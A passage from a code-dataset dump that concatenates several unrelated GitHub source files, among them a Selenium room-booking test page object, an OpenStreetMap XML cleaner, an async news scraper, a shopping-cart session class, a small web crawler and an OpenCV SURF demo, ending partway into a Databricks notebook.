self.action_chain_click(self.BOOKED_STATUS)\n sleep(2)\n assert \"Select Booked status done\"\n except Exception as e:\n print(f\"select_booked_status exception: e \\n{traceback.format_exc()}\")\n self.take_screenshot(f\"select_booked_status/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n\n def select_all_status(self):\n sleep(5)\n try:\n self.action_chain_click(self.STATUS_DROPDOWN)\n sleep(2)\n self.action_chain_click(self.ALL_STATUS)\n sleep(2)\n assert \"Select All status done\"\n except Exception as e:\n print(f\"select_all_status exception: e \\n{traceback.format_exc()}\")\n self.take_screenshot(f\"select_all_status/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n\n def enter_agenda(self):\n try:\n self.host_selection(self.BOOKING_AGENDA, TestData.ROOM_AGENDA)\n except Exception as e:\n print(\"Agenda error exception: \", e)\n\n def new_contact_guest(self, contact_name, contact_email):\n try:\n self.host_selection(self.ATTENDEE_DETAILS, contact_name)\n self.do_send_keys(self.CONTACT_EMAIL, contact_email)\n self.do_click(self.CONTACT_RIGHT_TICK)\n sleep(2)\n except Exception as e:\n print(\"new_contact_guest exception: \", e)\n\n def enter_datetime(self):\n try:\n # self.do_click(self.START_DATE)\n # self.action_chain_click(self.START_DATE_X)\n self.date_selection_chain(\n self.START_DATE, TestData.ROOM_START_DATE, 18)\n # self.do_click(self.END_DATE)\n self.date_selection_chain(\n self.END_DATE, TestData.ROOM_END_DATE, 18)\n except Exception as e:\n print(\"enter_datetime exception: \", e)\n\n def enter_datetime_weekly(self):\n try:\n self.do_click(self.START_DATE)\n self.action_chain_click(self.START_DATE_X)\n self.date_selection_chain(\n self.START_DATE, TestData.ROOM_WSTART_DATE, 18)\n self.do_click(self.END_DATE)\n self.date_selection_chain(\n self.END_DATE, TestData.ROOM_WEND_DATE, 18)\n except Exception as e:\n print(\"enter_datetime exception: \", e)\n\n def resource_page_booking_check(self):\n try:\n rpage_status = self.get_element_text_by_xpath(\n self.ROOM_124_RPAGE_STATUS_CHECK)\n assert rpage_status == \"Booked\"\n print(\"rpage_status passed as: \", rpage_status)\n print(\"At the find resource page, status of booking should be changed from available to booked for the booked time frame: Passed\")\n except Exception as e:\n print(\"resource_page_booking_check exception: \", e)\n self.take_screenshot(f\"resource_page_booking_check/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n\n def resource_details_page_check(self):\n self.scroll_to_element(self.SCHEDULE_LISTING)\n sleep(2)\n try:\n self.do_click(self.I_BUTTON)\n sleep(3)\n eltext = self.get_element_text(self.I_INFO).split('\\n')\n print(\"eltext: \", eltext)\n sleep(3)\n print(\"At the resource details page, booking should be available: Passed\")\n except Exception as e:\n print(\"I_button exce: \", e)\n self.take_screenshot(f\"resource_details_page_check/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n self.do_send_keys(self.BODY, Keys.PAGE_UP)\n\n def check_my_booking(self):\n try:\n self.do_click(self.MY_BOOKING_NAV)\n sleep(3)\n self.scroll_to_element_by_xpath(self.ROOM_124_CHECK_DIV)\n sleep(3)\n # Meeting Options\n meeting_options = self.get_element_text_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_BUTTONS_CHECK).split('\\n')\n std_meeting_options = ['Check in', '', 'Cancel Booking']\n assert meeting_options == std_meeting_options\n print(\"In My booking page, the created booking should be visible with two options i.e Check In and Cancel booking: Passed\")\n self.do_click_by_xpath(self.ROOM_124_CHECK_DIV)\n sleep(3)\n except Exception as e:\n print(\"check_my_roombooking exception: \", e)\n\n def daily_repeat(self):\n try:\n self.do_click(self.REPEAT_DROPDOWN)\n sleep(3)\n self.do_click(self.REPEAT_DAILY)\n sleep(2)\n # self.date_selection_chain(self.REPEAT_FREQUENCY, TestData.REPEAT_FREQUENCY, 2)\n sleep(2)\n self.date_selection_chain(\n self.REPEAT_TILL_DATE, TestData.REPEAT_TILL_DATE[:11], 2)\n except Exception as e:\n print(\"daily_repeat exception: \", e)\n\n def daily_repeat2(self):\n try:\n self.do_click(self.REPEAT_DROPDOWN)\n sleep(3)\n self.do_click(self.REPEAT_DAILY)\n sleep(2)\n # self.date_selection_chain(self.REPEAT_FREQUENCY, TestData.REPEAT_FREQUENCY, 2)\n sleep(2)\n self.date_selection_chain(\n self.REPEAT_TILL_DATE, TestData.REPEAT_TILL_DATE3, 2)\n except Exception as e:\n print(\"daily_repeat2 exception: \", e)\n\n def weekly_repeat(self):\n try:\n self.do_click(self.REPEAT_DROPDOWN)\n sleep(3)\n self.do_click(self.REPEAT_WEEKLY)\n sleep(2)\n self.date_selection_chain(\n self.REPEAT_TILL_DATE, TestData.WEEKLY_REPEAT_TILL_DATE, 2)\n sleep(2)\n # self.date_selection_chain(self.REPEAT_FREQUENCY, TestData.REPEAT_FREQUENCY, 2)\n except Exception as e:\n print(\"weekly_repeat exception: \", e)\n\n def cancel_booking(self):\n try:\n self.scroll_to_element_by_xpath(self.ROOM_124_CHECK_DIV)\n sleep(3)\n # Meeting Options\n meeting_options = self.get_element_text_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_BUTTONS_CHECK).split('\\n')\n std_meeting_options = ['Check in', '', 'Cancel Booking']\n # assert meeting_options == std_meeting_options\n print(\"In My booking page, the created booking should be visible with two options i.e Check In and Cancel booking: Passed\")\n self.do_click_by_xpath(self.ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON)\n sleep(4)\n self.do_click(self.MY_SHORTCUTS_H3)\n self.action_chain_sendkeys_1(self.BODY, Keys.HOME)\n self.do_click(self.REFRESH_BOOKINGS)\n except Exception as e:\n print(\"cancel_booking exception: \", e)\n\n def cancel_last_booking(self):\n try:\n self.scroll_to_element_by_xpath(self.ROOM_124_CHECK_DIV_LAST)\n sleep(3)\n print(\"In My booking page, the created booking should be visible with two options i.e Cancel booking: Passed\")\n self.do_click_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON_LAST)\n sleep(20)\n except Exception as e:\n print(\"cancel_last_booking exception: \", e)\n\n def change_date_format(self, string):\n string1 = f'{string[3:6]} {string[:2]} {string[7:11]}'\n return string1\n\n def cancel_some_bookings(self, crange):\n try:\n for i in range(1, crange):\n sleep(2)\n a = 1\n print(\n f\"i: {i} \\n xpath: {self.ROOM_124_MEETING_OPTIONS_FOLLOWING_CANCEL_BUTTON+str([a])}\")\n self.scroll_to_element_by_xpath(\n f'{self.ROOM_124_CHECK_DIV+str([a])}')\n sleep(3)\n # Meeting Options\n meeting_options = self.get_element_text_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_BUTTONS_CHECK+str([a])).split('\\n')\n std_meeting_options = ['Check in', '', 'Cancel Booking']\n # assert meeting_options == std_meeting_options\n print(\"In My booking page, the created booking should be visible with two options i.e Check In and Cancel booking: Passed\")\n if i == 1:\n print(\"in i=1\")\n self.scroll_to_element_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON)\n self.do_click_by_xpath(\n self.ROOM_124_MEETING_OPTIONS_CANCEL_BUTTON)\n else:\n print(\"in i!=1\")\n self.scroll_to_element_to_mid_by_xpath(\n f'{self.ROOM_124_MEETING_OPTIONS_FOLLOWING_CANCEL_BUTTON+str([a])}')\n self.do_click_by_xpath(\n f'{self.ROOM_124_MEETING_OPTIONS_FOLLOWING_CANCEL_BUTTON+str([a])}')\n sleep(4)\n ele = self.is_visible(self.VRS_LOADER)\n print(\"vrs loadr: \", ele)\n # while True:\n # if ele == True:\n # sleep(2)\n # else:\n # break\n self.do_click(self.MY_SHORTCUTS_H3)\n self.action_chain_sendkeys_1(self.BODY, Keys.HOME)\n self.do_click(self.REFRESH_BOOKINGS)\n except Exception as e:\n print(\"cancel_some_bookings exception: \", e)\n\n def extend_booking(self, etime):\n try:\n pre_extend_time = self.get_element_text_by_xpath(\n self.PRE_EXTEND_TIME)\n print(\"pre_extend_time: \", pre_extend_time)\n self.do_click_by_xpath(self.CHECKIN_BOOKING)\n sleep(12)\n self.do_click_by_xpath(self.EXTEND_BOOKING)\n sleep(5)\n self.do_click(etime)\n sleep(12)\n textend_confirm = self.get_element_text_by_xpath(\n self.EXTEND_BOOKING_TEXT_CONFIRM)\n print(\"text: \", textend_confirm)\n assert textend_confirm == \"In Use, Booking Extended\"\n post_extend_time = self.get_element_text_by_xpath(\n self.PRE_EXTEND_TIME)\n print(\"post_extend_time: \", post_extend_time)\n assert pre_extend_time != post_extend_time\n except Exception as e:\n print(\"extend_booking exception: \", e)\n\n def do_logout(self):\n try:\n self.do_click(self.LOGOUT_DROPDOWN)\n sleep(2)\n self.do_click(self.LOGOUT_BUTTON)\n except Exception as e:\n print(\"do_logout exception: \", e)\n\n def start_selection(self):\n try:\n sleep(1)\n print(\"Selecting Location\")\n self.select_location()\n print(\"Selecting Floor\")\n self.select_floor()\n # Checking available resources\n self.select_available_status()\n # Selecting resource type\n self.select_resource_type()\n # Clicking on list view\n self.do_click(self.LIST_VIEW_BUTTON)\n sleep(3)\n except Exception as e:\n print(f\"start_selection exception: e \\n{traceback.format_exc()}\")\n self.take_screenshot(f\"start_selection/Ex_{TestData.CDATE[:10]}/{TestData.CDATE[1:]}.png\")\n\n #\n","repo_name":"veris-vivekanand/PortalAutomation_v1","sub_path":"Pages/RoomBookingPage.py","file_name":"RoomBookingPage.py","file_ext":"py","file_size_in_byte":27424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32442622144","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 28 05:19:43 2023\n\n@author: ryanadhitama\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(0) # Untuk membuat hasil yang dapat direproduksi\nn_data = 1000\n\ndki_jakarta = np.random.normal(30, 5, n_data)\njawa_barat = np.random.normal(28, 4, n_data)\njawa_tengah = np.random.normal(32, 6, n_data)\njawa_timur = np.random.normal(27, 3, n_data)\nbanten = np.random.normal(31, 5, n_data)\nyogyakarta = np.random.normal(29, 4, n_data)\nbali = np.random.normal(33, 6, n_data)\n\n# Line plot\nplt.figure(figsize=(12, 6))\nplt.plot(dki_jakarta, label='DKI Jakarta')\nplt.plot(jawa_barat, label='Jawa Barat')\nplt.plot(jawa_tengah, label='Jawa Tengah')\nplt.plot(jawa_timur, label='Jawa Timur')\nplt.plot(banten, label='Banten')\nplt.plot(yogyakarta, label='Yogyakarta')\nplt.plot(bali, label='Bali')\n\nplt.xlabel('Data ke-')\nplt.ylabel('Suhu (°C)')\nplt.title('Line Plot Suhu di Tujuh Provinsi')\nplt.legend()\nplt.grid(True)\nplt.show()\n","repo_name":"ryanadhitama/lineplot-boxplot-matplotlib","sub_path":"lineplot.py","file_name":"lineplot.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34934530636","text":"\"\"\"File to read an Open Street Map xml file and clean it.\n\nThis module has code to clean a .osm file and turn it into a json file. The\nfunctions can be used individually or the function process_map can take in a\n.osm file and return a cleaned .json file.\n\n\nAttributes:\n PROBLEMCHARS (regex): Compiled regular expression to determine if there\n are any characters that would not work or be problematic when\n trying to structure the data.\n CITY_NAMES (list): List of acceptable city names for a node/way to be in.\n CREATED (list): List of strings that correspond to information in a XML\n elements attribute section about who added the data.\n POSTCODES (list): List of acceptable Minneapolis post codes.\n STREET_DICT (dict): Dictionary to transform non-normal street endings to\n more standardized endings.\n\"\"\"\nimport xml.etree.cElementTree as ET\nimport re\nimport codecs\nimport json\n\nPROBLEMCHARS = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\.{}\\t\\r\\n]')\nCITY_NAMES = [\"Minneapolis\", \"Saint Paul\", \"Minneapolis, MN\", \"St. Paul\"]\nCREATED = [\"version\", \"changeset\", \"timestamp\", \"user\", \"uid\"]\nPOSTCODES = [\"55401\", \"55402\", \"55403\", \"55404\", \"55405\", \"55406\", \"55407\",\n \"55408\", \"55409\"]\nPOSTCODES += [\"554\" + str(x) for x in range(10, 89)]\nSTREET_TYPES = {\"ave\": \"Avenue\", \"av\": \"Avenue\", \"blvd\" : \"Boulevard\",\n \"boulivard\" : \"Boulevard\", \"ct\": \"Court\", \"dr\": \"Drive\",\n \"e\": \"East\", \"ln\": \"Lane\", \"n\": \"North\", \"ne\": \"Northeast\",\n \"nw\": \"Northwest\", \"northwest`\": \"Northwest\", \"pkwy\": \"Parkway\",\n \"pl\": \"Plaza\", \"rd\": \"Road\", \"s\": \"South\", \"se\": \"Southeast\",\n \"sw\": \"Southwest\", \"street\": \"Street\", \"st\": \"Street\",\n \"trl\": \"Trail\", \"ter\": \"Terrace\", \"terr\": \"Terrace\",\n \"w\": \"West\"}\n\n\ndef in_city_limits(lat, lon):\n \"\"\"Determines if a node is within the Minneapolis city boundaries.\n\n Args:\n lat (float): The latitude of the point.\n long (float): The longitude of the point.\n\n Returns:\n bool: True if latitude and longitude are within the city boundaries\n and False otherwise.\n \"\"\"\n if lat <= 45.05125 and lat >= 44.889787:\n if lon <= -93.193794 and lon >= -93.329437:\n return True\n\n return False\n\ndef clean_street_field(value):\n \"\"\"Makes sure the street name is formated correctly.\n\n Args:\n value (str): The original street name.\n\n Returns:\n str: Same string or updated string depending on how it was originally\n formated.\n \"\"\"\n\n street = value.split(' ')\n value = ''\n\n for word in street:\n # Space between words\n if len(value) != 0:\n value += ' '\n\n temp_word = word.lower()\n temp_word.replace('.', ' ')\n\n if temp_word in STREET_TYPES.keys():\n value += STREET_TYPES[temp_word]\n else:\n value += word\n\n return value\n\ndef clean_k_value(value):\n \"\"\"Cleans string.\n\n Cleans the value of a k-tag fixing: misspelling, unnecessary capitalization.\n Also, if the value contains any problem characters or a ':', then the\n information was most likely entered incorrectly or in a manner that is\n inconsistent with OSM standards and is therfore ignored.\n\n Args:\n value (str): Value from a k-tag of an element in the osm data.\n\n Returns:\n str: Cleaned string.\n None: Value contains problem characters.\n \"\"\"\n if PROBLEMCHARS.search(value) != None or ':' in value:\n return None\n\n if value == 'CHURCH':\n return 'place_of_worship'\n elif value == 'parking_enterance':\n return 'parking_entrance'\n\n return value\n\ndef clean_subfield_tags(key, value):\n \"\"\"Cleans and structures the subfields of a k-tag.\n\n Args:\n key (str): The key string of the subfield.\n value (str): The value associated with the key.\n\n Returns:\n (int, str, str): Number to specify whether or not to keep the data\n element, the key in the dictionary, and the value for that key.\n \"\"\"\n if key.startswith('addr:'):\n # Deals with inconsistent state entered\n if key == 'addr:state':\n if 'w' not in str.lower(value):\n return (0, 'state', 'MN')\n\n elif key == 'addr:postcode':\n if value.isdigit() and len(value) >= 5:\n if len(value) == 10 and value[:6] in POSTCODES:\n return (0, 'postcode', value[:6])\n elif len(value) == 5 and value in POSTCODES:\n return (0, 'postcode', value)\n\n elif key == 'addr:street':\n return (0, 'street', clean_street_field(value))\n\n elif key == 'addr:city':\n if value in CITY_NAMES:\n if 'MN' in value:\n return (0, 'city', CITY_NAMES[0])\n elif value == 'St. Paul':\n return (0, 'city', CITY_NAMES[1])\n else:\n return (0, 'city', value)\n\n elif ':' not in key[5:]:\n return (0, key[5:], value)\n\n return (-1, None, None)\n\ndef shape_k_tag(element, node):\n \"\"\"Cleans the k-tags of an element.\n\n Adds fields and subfields to a dictionary corresponding to speicific\n information. (e.g. address information and amentiy information)\n\n Args:\n element: The XML element beind cleaned.\n node (dict): The dictionary containing the new structured and cleaned\n information from element.\n\n Returns:\n dict: An updated node dictionary.\n None: Inconsistent data in the k-tags that indicated the node wasn't\n actually in Minneapolis.\n \"\"\"\n # Lists to hold specific special fields\n address_list = []\n node_refs = []\n\n\n # Iterate through tags and nds of an element\n for child in element:\n if child.tag == 'tag':\n if PROBLEMCHARS.search(child.attrib['k']) is None:\n # Subfield information\n if \":\" in child.attrib[\"k\"]:\n (spec, key, value) = clean_subfield_tags(child.attrib['k'],\n child.attrib['v'])\n if spec == -1:\n return None\n else:\n address_list.append((key, value))\n\n # All other k tags\n else:\n value = clean_k_value(child.attrib['v'])\n\n if value:\n node[child.attrib['k']] = value\n\n elif child.tag == 'nd':\n node_refs.append(child.attrib['ref'])\n if address_list:\n node['address'] = dict(subfields_list[0])\n if node_refs:\n node['node_refs'] = node_refs\n\n return node\n\ndef shape_element(element):\n \"\"\"Cleans an individual element in an XML tree.\"\"\"\n node = {}\n\n if element.tag == \"node\" or element.tag == \"way\":\n # Latitude and longitude of point\n lat = lon = None\n try:\n lat = float(element.attrib[\"lat\"])\n lon = float(element.attrib[\"lon\"])\n\n # GEO 2D data\n node[\"pos\"] = [lat, lon]\n except KeyError:\n pass\n except ValueError:\n pass\n\n # Lat is positive and lon is neg, so if they exist they won't be equal\n if (lat != lon and in_city_limits(lat, lon)) or lat == lon:\n # Type of node\n node['type'] = element.tag\n\n # Attributes of element\n created_tuples = []\n for key, value in element.attrib.items():\n if key in ['lat', 'lon']:\n continue # Pos data already added\n elif key in CREATED:\n created_tuples.append((key, value))\n else:\n node[key] = value\n\n # Created dict\n node[\"created\"] = dict(created_tuples)\n\n # Shape and store children tags\n node = shape_k_tag(element, node)\n\n return node\n\n return None\n\ndef process_map(file_in, collection):\n \"\"\"Cleans map data and stores to a file.\n\n Receives a .osm file and goes node-by-node cleaning element and\n possibly adding it to the clean .json file with the same name as the .osm\n file. Also, adds the element into the collection.\n\n Args:\n file_in (str): Name of the file containing the data to be cleaned.\n collection (MongoCollection): Collection that the cleaned files will\n be stored in.\n \"\"\"\n file_out = \"{0}.json\".format(file_in[:-4])\n data = []\n\n # Store JSON ouput\n with codecs.open(file_out, \"w\") as writer:\n for _, element in ET.iterparse(file_in):\n # Clean element\n element = shape_element(element)\n if element:\n data.append(element)\n writer.write(json.dumps(element) + \"\\n\")\n\n collection.insert_many(data)\n","repo_name":"GraysonRicketts/OSM-Data-Wrangling","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":8947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75030656426","text":"import datasets\n\n#async packages\nfrom aiohttp import ClientSession\nimport asyncio\n# basic python packages\nimport requests\nimport re\n# dataframes\nimport pandas as pd\n# file systems\nfrom glob import glob\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\nfrom tempfile import NamedTemporaryFile\nimport csv\n\n\nsummary_df = pd.read_csv('text_summary_stats.csv')\n\n\n\ndef gen_temp_file():\n if len(glob('text_datasets/*.csv')):\n pass\n else:\n try:\n subprocess.run(['python','data_prep.py'])\n except:\n subprocess.run(['python3','data_prep.py'])\n\n csv_files = glob('text_datasets/*.csv')\n \n \n if os.path.exists(os.path.join(os.getcwd(), 'online_news_popularity_data')):\n pass\n else:\n os.mkdir(os.path.join(os.getcwd(), 'online_news_popularity_data'))\n \n \n fpath = os.path.join(os.getcwd(), 'online_news_popularity_data', 'online_news_popularity_data.csv')\n# with NamedTemporaryFile(mode='w', suffix = '.csv', \n# dir = os.path.join(os.getcwd(), 'online_news_popularity_data'), \n# delete=False) as f:\n\n\n with open(fpath, 'w') as f:\n fieldnames = pd.read_csv(csv_files[0]).columns.tolist()\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n\n for csv_file in tqdm(csv_files):\n with open(csv_file) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n row_dict = {fieldname: row[fieldname] for fieldname in fieldnames}\n writer.writerow(row_dict)\n# writer.writerow({'title': row['title'],\n# 'content': row['content'],\n# 'shares': row['shares']})\n return fpath\n\n\n\n\n\n\n\n\ndef get_texts(urls, shares):\n df = asyncio.run(download_all_data(urls, shares))\n return df\n\n\nasync def text_download(url, session):\n async with session.get(url) as resp:\n if resp.status == 200:\n try:\n html = await resp.read()\n soup = BeautifulSoup(html, 'html.parser')\n title = soup.find('title').text.split(' | ')[0]\n paragraphs = soup.find_all('p')\n texts = [p.text for p in paragraphs if 'nggallery' not in p.text]\n text = '\\n'.join(texts)\n except:\n title, text = None, None\n return title, text\n else:\n return None, None\n \n\nasync def download_all_data(urls, shares):\n async with ClientSession() as session:\n tasks = [text_download(url, session) for url in urls]\n full_texts = await asyncio.gather(*tasks)\n titles = [text[0] for text in full_texts]\n contents = [text[1] for text in full_texts]\n df = pd.DataFrame(zip(titles, contents, shares), columns = ['title','content','shares'])\n return df\n\ndef save_text_csv(urls, shares, file_name, summary):\n try:\n dataset_dir = os.path.join(os.getcwd(), 'text_datasets')\n if os.path.exists(dataset_dir):\n pass\n else:\n os.mkdir(dataset_dir)\n\n df = asyncio.run(download_all_data(urls, shares))\n df = pd.concat([df.reset_index(drop = True), summary.reset_index(drop = True)], axis = 1)\n df.to_csv(os.path.join(dataset_dir, file_name), index = False)\n except:\n pass\n return None\n\n\n\n\n\n\nif __name__ == '__main__':\n \n dl_manager = datasets.DownloadManager()\n _DOWNLOAD_URL = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00332/OnlineNewsPopularity.zip'\n archive = dl_manager.download(_DOWNLOAD_URL)\n\n for path, f in dl_manager.iter_archive(archive):\n if path[-3:] == 'csv':\n df = pd.read_csv(f)\n\n df.columns = df.columns.str.strip()\n urls = df.url.str.replace('http://', 'https://')\n shares = df.shares\n N = df.shape[0]\n batch_size = 100\n print('start process')\n res = Parallel(n_jobs = -1)(delayed(save_text_csv)(urls[i*batch_size:(i+1)*batch_size], shares[i*batch_size:(i+1)*batch_size], f\"dataset_{i}.csv\", summary_df.loc[i*batch_size:(i+1)*batch_size,:]) for i in tqdm(range(N//batch_size+1)))\n \n path = gen_temp_file()\n df = pd.read_csv(path)\n df = df.loc[df.notnull().prod(axis = 1).astype(bool),:].reset_index(drop = True)\n df.to_csv(path, index = False)\n\n# text_df = get_texts(urls[:1000], shares[:1000])\n# save_text_csv(urls[:100], shares[:100], 'text_data.csv')\n# text_df.to_csv('text_data.csv', index = False)\n\n# res = Parallel(n_jobs=-1)(delayed(fun)() for fun in self.functions.values())","repo_name":"leeparkuky/UKYDataScienceComp2023","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11062281660","text":"import os, re, sys\n\ntry:\n\tfrom lxml import etree\nexcept ImportError:\n\tprint(\"python-lxml module not found! (python-lxml)\")\n\tprint(\"see http://codespeak.net/lxml/\")\n\tprint(\"programm terminating ...!\")\n\tsys.exit(-1)\n\n\n##################################################\n# constants:\n# namespace-constant for src2srcml\n__cppnscpp = 'http://www.srcML.org/srcML/cpp'\n__cppnsdef = 'http://www.srcML.org/srcML/src'\n__cpprens = re.compile('{(.+)}(.+)')\n\n__conditionals = ['if', 'ifdef', 'ifndef']\n__conditionals_endif = ['endif']\n##################################################\n\ndef _getIfdefEndifRatio(root):\n\t\"\"\"This function determines all conditionals and their corresponding\n\tendifs and returns a counter for each of them.\"\"\"\n\tifdef = 0\n\tendif = 0\n\n\t# get all nodes\n\tallnodes = [node for node in root.iterdescendants()]\n\n\tfor node in allnodes:\n\t\tns, tag = __cpprens.match(node.tag).groups()\n\n\t\tif ((tag in __conditionals) \\\n\t\t\t\tand (ns == __cppnscpp)):\n\t\t\tifdef += 1\n\t\tif ((tag in __conditionals_endif) \\\n\t\t\t\tand (ns == __cppnscpp)):\n\t\t\tendif += 1\n\n\treturn (ifdef, endif)\n\n\ndef apply(folder):\n\t\"\"\"This function applies the determination function (getIfdefEndifRation)\n\tto each file and prints out the differance in case there is one.\"\"\"\n\tfolder = os.path.abspath(folder)\n\tfiles = os.listdir(folder)\n\tfiles = filter(lambda n: os.path.splitext(n)[1] == \".xml\", files)\n\n\tfor file in files:\n\n\t\ttry:\n\t\t\ttree = etree.parse(file)\n\t\texcept etree.XMLSyntaxError:\n\t\t\tprint(\"ERROR: cannot parse (%s). Skipping this file!.\" % file)\n\n\t\troot = tree.getroot()\n\t\tifdef, endif = _getIfdefEndifRatio(root)\n\n\t\tif (ifdef != endif):\n\t\t\tprint(\"INFO: (%30s) ifdef : endif is %5s : %5s\" % (file, str(ifdef), str(endif)))\n\n\ndef usage():\n\t\"\"\"This function prints usage-informations to stdout.\"\"\"\n\tprint('usage:')\n\tprint(' ' + sys.argv[0] + ' ')\n\n\n##################################################\nif __name__ == '__main__':\n\n\tif (len(sys.argv) < 2):\n\t\tusage()\n\t\tsys.exit(-1)\n\n\tfolder = sys.argv[1]\n\tif (os.path.isdir(folder)):\n\t\tapply(folder)\n\telse:\n\t\tusage()\n\t\tsys.exit(-1)\n","repo_name":"Florian-Striebel/RIMEL-F","sub_path":"scripts/ifdefendifratio.py","file_name":"ifdefendifratio.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17987982558","text":"class Items(object):\n def __init__(self, request):\n if request.session.get('items', False):\n self.items = request.session['items']\n else:\n self.items = []\n self.alert = 'success'\n\n def add_item(self, request, item_id):\n try:\n item = {'id': item_id, 'count': 1}\n self.items.append(item)\n request.session['items'] = self.items\n except Exception:\n self.alert = 'error'\n return self.alert\n\n def delete_item(self, request, item_position):\n try:\n self.items.pop(item_position-1)\n request.session['items'] = self.items\n except Exception:\n self.alert = 'error'\n return self.alert\n\n def change_count(self, request, item_position, count):\n try:\n item = self.items[item_position-1]\n if count > 0:\n item['count'] = count\n else:\n item['count'] = 1\n self.items[item_position-1] = item\n request.session['items'] = self.items\n except Exception:\n self.alert = 'error'\n return self.alert\n\n","repo_name":"arskhal/shop","sub_path":"cart/cart_items.py","file_name":"cart_items.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73403454186","text":"from itertools import combinations \nimport numpy as np\n\nn, m = map(int, input().split())\ngraph = [list(map(int, input().split())) for _ in range(n)]\nprint(np.array(graph))\n\nhouses = []\nchickes = []\nresult = 0\nfor i in range(n):\n for j in range(n):\n if graph[i][j] == 1:\n houses.append((i,j))\n elif graph[i][j] == 2:\n chickes.append((i,j))\n\n# \nchickin_combos = list(combinations(chickes, m)) # -> m=2일 경우 (4,2), (4,3).....\n\n# i에는 m개의 좌표가 담김. ex) (4,2), (2,3).... 총 m개\n\"\"\" \n1. 먼저 m개의 치킨집 조합을 뽑는다.\n2. 특정 치킨집 조합에서....\n3. 집을 loop 한다.\n4. 요 loop에서 집 하나와 조합에 있는 치킨집과의 거리를 구한다.\n\"\"\"\nfor combo in chickin_combos:\n temp_dist = 0\n for house in houses:\n chickin_lengths = []\n for i in combo:\n chickin_lengths.append((abs(house[0]-i[0]) + abs(house[1]-i[1]))) \n temp_dist += min(chickin_lengths)\n \n result = min(result, temp_dist)\n\nprint(result)\n\n \n \n","repo_name":"cylanokim/Data_Analysis","sub_path":"python_Adv/치킨 거리 dfs.py","file_name":"치킨 거리 dfs.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4206703521","text":"from __future__ import annotations\nfrom ..entities.data_source import DataSource\nfrom typing import List\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom uuid import uuid4\n\n\nclass WebSite(DataSource):\n def __init__(self, url: str):\n self._url = url\n self._content = None\n\n def get_name(self, prefix: str = '') -> str:\n return prefix + str(datetime.now().strftime(\"%H-%M-%S\")) + '_' + str(uuid4()) + '.html'\n\n def get_content(self):\n print(f'Getting content from {self._url}...')\n response = requests.get(self._url)\n self._content = response.text\n return self._content\n\n def get_links(self) -> List['WebSite']:\n links = []\n if self._content:\n soup = BeautifulSoup(self._content, 'html.parser')\n for link in soup.find_all('a'):\n links.append(WebSite(link.get('href')))\n return links\n","repo_name":"vukolov/crawler","sub_path":"webcrawler/external/web_site.py","file_name":"web_site.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8002242479","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy\nfrom pylab import *\n\n\n# 读入图像\nim = cv2.imread('../data/empire.jpg')\n# 下采样\nim_lowres = cv2.pyrDown(im)\n# 转化为灰度图像\ngray = cv2.cvtColor(im_lowres, cv2.COLOR_RGB2GRAY)\n# 检测特征点\ns = cv2.SURF()\nmask = numpy.uint8(ones(gray.shape))\nkeypoints = s.detect(gray, mask)\n# 显示图像及特征点\nvis = cv2.cvtColor(gray, cv2.COLOR_GRAY2BGR)\nfor k in keypoints[::10]:\n cv2.circle(vis, (int(k.pt[0]), int(k.pt[1])), 2, (0, 255, 0), -1)\n cv2.circle(vis, (int(k.pt[0]), int(k.pt[1])), int(k.size), (0, 255, 0), 2)\ncv2.imshow('local descriptors', vis)\ncv2.waitKey()\n\ncv2.imwrite('../images/ch10/ch10_P261_Fig10-3.jpg',vis)","repo_name":"willard-yuan/pcv-book-code","sub_path":"ch10/ch10_P261_Fig10-3.py","file_name":"ch10_P261_Fig10-3.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":492,"dataset":"github-code","pt":"37"} +{"seq_id":"2453496017","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ### Driver Standings Transformation from F1 Driver Standings Page\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_file_date\", \"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/configuration\"\n\n# COMMAND ----------\n\n# MAGIC %run 